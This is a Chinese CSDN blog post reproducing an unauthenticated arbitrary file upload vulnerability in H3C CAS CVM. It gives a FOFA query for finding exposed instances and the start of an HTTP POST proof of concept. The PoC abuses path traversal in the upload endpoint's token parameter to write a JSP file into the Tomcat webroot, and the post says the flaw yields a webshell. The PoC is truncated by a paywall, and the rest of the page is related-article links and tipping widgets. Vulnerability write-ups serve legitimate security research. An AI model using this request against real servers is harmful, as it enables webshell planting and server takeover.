H3C CVM 前台任意文件上传漏洞复现

最新推荐文章于 2024-04-15 06:35:38 发布
最新推荐文章于 2024-04-15 06:35:38 发布
阅读量1.1k 收藏 8
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134697278
版权

0x01 产品简介

  H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。

0x02 漏洞概述

  H3C CVM /cas/fileUpload/upload接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

0x03 复现环境

FOFA:app="H3C-CVM"

0x04 漏洞复现 

PoC

POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp&name=123 HTTP/1.1
Host: your-ip
Content-Range: bytes 0-10/20
Referer: http://your-ip/cas/login
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like G
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
H3C CVM 前台任意文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-05 320
H3C CVM 前台任意文件上传漏洞(含批量验证poc)
HP 3COM/H3C Intelligent Management 几个 Luigi Auriemma发现的cve漏洞
爱杀之爪的矩阵
04-25 1301
这个 Luigi Auriemma 大牛 挖各种远程开端口软件的漏洞啊 ,牛叉... 没事看下他挖的几个关于HP 3COM/H3C Intelligent Management 的漏洞 ,不用补丁对比,自己跟着看了一遍,当然了  是猜测 并不一定正确。 CVE-2011-1851 .text:0040AA05 loc_40AA05:
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9182
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
cvm服务器虚拟机,macOS CVM服务器漏洞曝光
weixin_35223575的博客
07-31 298
研究人员在macOS、iOS和iPadOS的CVM服务器中发现1个安全漏洞。研究人员在CVM服务器(Core Virtual Machine Server,核心虚拟机服务器)中发现一个安全漏洞漏洞CVE编号为CVE-2021-30724,攻击者利用该漏洞可以进行权限提升。受影响的设备包括运行macOS Big Sur 11.4、iOS 14.6和 iPadOS 14.6的设备。CVMServer...
漏洞复现-H3C系列
aming小老弟
03-15 702
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务器存在被控的风险。
H3C CVM 前台任意文件上传漏洞.md
07-09
H3C CVM 前台任意文件上传漏洞
H3C云计算《CVM标准版功能原理》培训.rar
07-31
计算责源概念及部署mp4 虚拟交换机原理及部署mp4 CAS存储資源挂载原理及部署1mp4 CAS存储资源挂载原理及部署2.mp4 高可靠性原理及部署mp
H3C CAS云计算最佳实践和配置指导手册汇总集.rar
06-04
13 H3C CAS-CVM双机热备配置指导 14 H3C CAS虚拟机备份恢复配置指导 15 H3C CAS云计算管理平台-云彩虹配置指导 16 H3C CAS云计算管理平台-AEP存储特性配置指导 17 H3C CAS GPU直通配置指导 18 H3C CAS-云容器...
H3C 云计算CAS产品典型配置案例汇总集.rar
09-21
目录: H3C_CAS支持硬件SR-IOV操作指导书 H3C_CAS与趋势产品联调操作配置指导书 H3C_CAS虚拟机内存隔离操作指导书 H3C_CAS虚拟机搭建双机热备环境方案及报告 ) ...H3C_CAS_CVM日志文件收集操作指导书
H3C CAS 3.0 云计算平台软件操作演示.rar
09-22
目录: H3C CAS3.0演示视频--一键系列 H3C CAS3.0演示视频--可视化监控 H3C CAS3.0演示视频(无字幕)--一键系列 H3C CAS3.0演示视频(无字幕)--可视化监控 ...H3C CAS3.0演示视频(无字幕)--跨CVM在线迁移
文件上传 FileUpload
Renqizhi专栏
04-17 519
    private void SaveImages()    {        ///检查文件扩展名字        errorAlertDiv.Visible = false;        if (UserImageUpload.HasFile)        {            string fileExt = System.IO.Path.GetExtension(UserIm
漏洞复现】大华智慧园区前台任意文件上传
2201_75756681的博客
01-03 1229
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。二、 漏洞概述大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
H3C CVM 前台任意文件上传漏洞(含批量验证poc)(1),2024年最新网络安全studio基础教程
最新发布
2301_78399466的博客
04-15 254
name: H3C CVM 前台任意文件上传漏洞
漏洞复现-某教育视频云平台前台某接口文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-07 577
复现某教育视频云平台前台某接口文件上传漏洞,附带自己写的poc脚本
漏洞复现-文件上传
hackzkaq的博客
11-06 125
在某次对某单位进行渗透测试时,遇到一个上传点,网站是java写的,但是上传jsp和jspx时会被waf拦截,但由于上传路径可控,经过不懈努力最终成果拿到shell,于是写这篇文章记录一下。目录中可以用来放置JSP的静态资源,在servlet3.0协议规范中,包含在jar文件 /META-INFO/resources/ 路径下的资源是可以直接访问的。目录通常是的一个特定目录,它用于存放与应用程序配置、安全性和资源管理相关的文件和目录,并且该目录下的资源文件无法直接通过浏览器访问。
华三防火墙(HC3)CVE-2014-3566/RC4漏洞解决方案
tan02034038的博客
11-01 935
CVE-2014-3566,也被称为"Poodle"漏洞,是一种影响到安全套接层协议(SSL)的漏洞。它于2014年10月公开,并由Google安全团队发现和披露。该漏洞存在于SSL 3.0协议中,攻击者可以利用它来获取通过加密连接传输的敏感信息,如登录凭据、会话信息等。漏洞的本质是利用了SSL 3.0中的一种弱点,即攻击者可以通过迫使通信双方降级到SSL 3.0协议,然后进行中间人攻击,从而解密和窃取通信内容。
利用H3C ER5100权限绕过漏洞***内网
weixin_34082695的博客
04-05 2785
昨天在老婆单位门口等老婆下班回家。在车里没事,决定给老婆单位做一个免费的***测试服务。因为老婆在某豪华车4S店工作,她们单位的WiFi信号隔着一条马路还是满格。虽然用的是WPA/WPA2加密。使用Aircrack-ng直接截获密码文件,上传到我用树莓派搭建的“24小时开机大数据社工库暨超牛逼彩虹表破解平台”用了不到十分钟就跑了出来,8位纯数字,我只能说呵呵。跟老婆打电话,...
腾讯云cvm中安装了docker 但找不到docker的配置文件
05-25
Docker的配置文件默认存放在`/etc/docker/`目录下,如果你在安装Docker时没有手动指定配置文件存放路径的话,可以尝试在终端中输入以下命令来查看该目录下是否存在配置文件: ``` ls /etc/docker/ ``` 如果该目录下没有任何文件或文件夹,可以尝试重新安装Docker,安装过程中请注意是否有配置文件存放路径的相关提示。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值